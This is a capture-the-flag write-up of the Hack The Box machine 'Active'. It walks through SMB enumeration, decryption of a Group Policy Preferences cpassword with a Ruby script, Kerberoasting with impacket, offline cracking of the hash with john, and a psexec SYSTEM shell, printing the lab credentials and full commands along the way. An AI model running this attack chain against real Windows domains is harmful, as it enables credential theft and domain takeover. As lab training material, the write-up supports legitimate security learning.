HTB: Active

Details

This machine is Active from Hack The Box

Recon

I started with a service discovery scan

root@kali:~# nmap -sV -p- -T4 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 10:13 EDT
Nmap scan report for 10.10.10.100
Host is up (0.030s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-07-14 14:27:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1022.57 seconds

The Box

Start at smb

root@kali:~# smbclient -L 10.10.10.100
Enter WORKGROUP\root's password: 

Just hit enter

Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    Replication     Disk
    SYSVOL          Disk      Logon server share
    Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

Wouldn't let me mount anything, so I tried smbclient properly

root@kali:~# smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password: 

I just hit enter

Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 

I dug around for a while and ended up in

\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

Where I took a look in a file

root@kali:~# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The cpassword was good, and found a ruby script which I modified to decrypt them

require 'rubygems'
require 'openssl'
require 'base64'

encrypted_data = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)

key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion

return pass
end

blah = decrypt(encrypted_data)
puts blah

Then ran it

root@kali:~# ruby dec.rb
dec.rb:13: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18  

The username was also in the file so the creds are

active.htb\SVC_TGS:GPPstillStandingStrong2k18

I added to the hosts file so I could poke at kerberos

root@kali:~# echo "10.10.10.100 active.htb" >> /etc/hosts

And use impacket to poke

root@kali:~# /usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2018-07-30 13:17:40

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7fcc76823466217e7a62c8224d4a7f2f$53a697482718c5c9d86a5ad393e119985384d26badb1f9551097fd2b8a81a5215516a10d4343bd5c69c481b0f44cc9f1813ff48dc1cf43fac2e2c21afa07284a61b46669b4f0e8bb164d26b1252f3075fe5902b83ce036876695e3c84a65e57ab51cd5ebde3bcf8e77e8eae35006d23d272f7f4a05914fad8392c471f0cd72f050d53eafad92241c34069b0b381eb83ec5fdeeaaf84b6017ad41b3e9ffb0745dc98bc8af7d9780aabbaee90fc8812a20afc22d19507ad88aada8cd2e3b705dd39b9366a3c18a6e92d6d56bfc3edb0346e288af3f0d50dd5977b361ca3edb4f48d748c6b4b9680aa14cd0e36ffc634574f185bc43d343167049a38e81b6368a92054803d666e80f0178f06d048935d286ebb2ec6da3cead4ca77d75f81f9b6d69e55db0a1e0b2eb04172cef7dcf960b1c9d8c26211fb6a221189f0afee2576af02ba9221bffa39d5a5f2910d95b800aee8878d25184382a034820101f1d74e501fc9b9e80402aa95802b8b2209630f872aa5256d0dce90d5c6bbd6cb82234011ded8bca79ef5b40b185d03cd3b88baef0cfecc5e66583a6ffc55f866e37a35ee006a92c0eb73f1c8535d56d1f8ff7b8c10cd87879e122af7e9741b929ab7521eaa61991001944c63fcc365d46b5d5f74f47f38b1cd1c265e11b65a47c52f8128578f9472829bcf24c26387fbd662b5120af894b15bd28815b96f9563e8811c487510f80d9d11a8438b0704439c2b2071ac736552f98a10fa2199aba9d2aee8bcd38c588e671177addbf0315e44504cbcd65d38d436fd15c3ee7f60b325728737c3d6087112fd4e66304cb3e0f16210856d957c214185402a00ff385e1685ac00e50a03d237e29cf228a7c150c55926065784ed879c771fdbb30f6949ed463dd3c2e6de5511d3ba8efee1ada644747075b66347a9ee31e86e384c6fa4240ab63ce9de9823b98c5209639c3ea27c5e10e737ff79e22c230e1259f0a2f05c383a81c40e2c82c5b53b3fb3e4ffc6068a1d8a6b79d9266c03c01423ce04be0eb2a0277323a82dc8cc11d3644017d16774fab1c38dce5f849ba40c50727b8ddc64e7957266407c2767488c7117f340e66670873f0f231497204d28b85081c307e0e4952e1f22db59b2c754cea8e37969f1802d9042ac3ac043c41217c5063d0d03547e4892a8eb73ec72743a946b8d64c0019bba4a2e84a6382e2ead16c1d6beac680022611765a44ba6b2833894b139407f65f6feef487146af3939ae9

This just gave me the admin hash, so I saved it as crack.txt and set john on it

root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:07 DONE (2019-07-14 11:23) 0.1267g/s 1335Kp/s 1335Kc/s 1335KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Then try psexec to get a shell

root@kali:~# /usr/share/doc/python-impacket/examples/psexec.py -dc-ip 10.10.10.100 active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file FftNicvJ.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service iymc on 10.10.10.100.....
[*] Starting service iymc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

There is the shell

C:\Windows\system32>whoami
nt authority\system

System, time for flags

C:\Users>type SVC_TGS\Desktop\user.txt
[REDACTED]

C:\Users>type Administrator\Desktop\root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.